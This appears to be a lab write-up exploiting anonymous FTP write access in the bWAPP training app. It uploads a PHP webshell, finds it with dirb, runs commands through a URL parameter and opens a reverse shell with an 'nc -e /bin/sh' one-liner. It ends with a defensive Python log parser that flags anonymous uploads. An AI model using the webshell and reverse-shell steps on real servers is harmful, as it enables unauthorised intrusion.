Tuesday, February 4, 2020

bWAPP Insecure FTP Service

In bWAPP there is an Insecure FTP module where you can exploit a misconfiguration: the anonymous user has the ability to write files to the server.

We start off by connecting to the remote FTP server with the ftp utility.

sam@ubuntu:~$ ftp 192.168.56.101
Connected to 192.168.56.101.
220 ProFTPD 1.3.1 Server (bee-box) [192.168.56.101]
Name (192.168.56.101:sam): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp> pwd
257 "/" is the current directory
ftp> 

Checking for write access

We are going to check for anonymous write access on the FTP server. To accomplish this we will simply 'put' a local file to the remote server.

ftp> put 1.php 1.php
local: 1.php remote: 1.php
200 PORT command successful
150 Opening BINARY mode data connection for 1.php
226 Transfer complete
34 bytes sent in 0.02 secs (1.3439 kB/s)
ftp> ls
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rw-r--r--   1 ftp      nogroup        34 Feb  4 08:11 1.php
-rw-rw-r--   1 root     www-data   543803 Nov  2  2014 Iron_Man.pdf
-rw-rw-r--   1 root     www-data   462949 Nov  2  2014 Terminator_Salvation.pdf
-rw-rw-r--   1 root     www-data   544600 Nov  2  2014 The_Amazing_Spider-Man.pdf
-rw-rw-r--   1 root     www-data   526187 Nov  2  2014 The_Cabin_in_the_Woods.pdf
-rw-rw-r--   1 root     www-data   756522 Nov  2  2014 The_Dark_Knight_Rises.pdf
-rw-rw-r--   1 root     www-data   618117 Nov  2  2014 The_Incredible_Hulk.pdf
-rw-rw-r--   1 root     www-data  5010042 Nov  2  2014 bWAPP_intro.pdf
226 Transfer complete
ftp> 

As you can see the transfer was successful, but we need to know the directory where we can access our '1.php' file. For this we will use 'dirb' on the remote host.

sam@ubuntu:~$ dirb http://192.168.56.101

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Feb  4 01:20:40 2020
URL_BASE: http://192.168.56.101/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.56.101/ ----
+ http://192.168.56.101/.bash_history (CODE:200|SIZE:83)                       
+ http://192.168.56.101/crossdomain (CODE:200|SIZE:200)                        
+ http://192.168.56.101/crossdomain.xml (CODE:200|SIZE:200)                    
==> DIRECTORY: http://192.168.56.101/drupal/                                   
==> DIRECTORY: http://192.168.56.101/evil/                                     
+ http://192.168.56.101/index (CODE:200|SIZE:45)                               
+ http://192.168.56.101/index.html (CODE:200|SIZE:588)                         
==> DIRECTORY: http://192.168.56.101/phpmyadmin/                               
+ http://192.168.56.101/README (CODE:200|SIZE:2491)                            
+ http://192.168.56.101/server-status (CODE:200|SIZE:5925)                     
==> DIRECTORY: http://192.168.56.101/webdav/ 

We find a few links to possible directories where our 1.php file is stored. But if we look at the very bottom we see a webdav directory. If we enter that directory we find this.

We can issue commands to the server with the 1.php backdoor we uploaded via the anonymous write vulnerability. Let's take a look at what we have with this URL: http://192.168.56.101/webdav/1.php?cmd=id;whoami;uname%20-a

What we want is a shell we can work with, rather than passing commands through the URL every time. So we will fire up netcat, listen for a reverse connect-back, and see if we can spawn a shell. http://192.168.56.101/webdav/1.php?cmd=nc -e /bin/sh 192.168.56.1 8088 will be our target URL.

sam@ubuntu:~$ nc -nvlp 8088
Listening on [0.0.0.0] (family 0, port 8088)
Connection from 192.168.56.101 50804 received!
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

As you can see we got a successful connect back and a system shell.
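For the defending side of the same misconfiguration, here is an added example (not part of the original post) that reads a ProFTPD TransferLog in the standard xferlog format, flags completed uploads made through the anonymous account, and marks those that a co-hosted web server would execute rather than serve. The log lines are constructed to mirror the session above; the field layout assumed is the wu-ftpd/ProFTPD xferlog layout.

```python
from dataclasses import dataclass

# Constructed xferlog lines modelled on the session above: one anonymous download,
# the anonymous upload of 1.php into the FTP root, and a normal user's upload.
SAMPLE_XFERLOG = """\
Tue Feb  4 08:10:12 2020 1 192.168.56.1 543803 /Iron_Man.pdf b _ o a anonymous@ ftp 0 * c
Tue Feb  4 08:11:02 2020 1 192.168.56.1 34 /1.php b _ i a anonymous@ ftp 0 * c
Tue Feb  4 08:12:40 2020 2 192.168.56.1 1024 /docs/notes.txt a _ i r bee ftp 1 bee c
"""

# Extensions a typical Apache/PHP setup executes when the FTP root is web-served.
EXECUTABLE_EXTS = (".php", ".phtml", ".php5", ".pl", ".cgi")

@dataclass
class Transfer:
    when: str
    remote_host: str
    size: int
    path: str
    direction: str    # 'i' incoming (upload), 'o' outgoing (download), 'd' deleted
    access_mode: str  # 'a' anonymous, 'g' guest, 'r' real user
    user: str
    status: str       # 'c' complete, 'i' incomplete

def parse_xferlog_line(line):
    """Parse one xferlog record; returns None for malformed lines."""
    t = line.split()
    if len(t) < 18:
        return None
    # The date is the first 5 tokens and exactly 9 fixed fields follow the
    # filename, so the filename is everything in between (it may contain spaces).
    path = " ".join(t[8:-9])
    return Transfer(when=" ".join(t[0:5]), remote_host=t[6], size=int(t[7]),
                    path=path, direction=t[-7], access_mode=t[-6],
                    user=t[-5], status=t[-1])

def anonymous_uploads(log_text):
    """Completed incoming transfers performed by the anonymous account."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_xferlog_line(line)
        if rec and rec.direction == "i" and rec.access_mode == "a" and rec.status == "c":
            hits.append(rec)
    return hits

def web_executable(rec):
    """True if the uploaded file would execute when reached through the web server."""
    return rec.path.lower().endswith(EXECUTABLE_EXTS)

if __name__ == "__main__":
    for rec in anonymous_uploads(SAMPLE_XFERLOG):
        flag = "EXECUTABLE" if web_executable(rec) else "data"
        print(f"{rec.when} {rec.remote_host} uploaded {rec.path} ({rec.size} bytes) [{flag}]")
```

Any hit at all means anonymous write is enabled; a hit marked EXECUTABLE in a web-exposed directory is the exact condition this post exploits.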
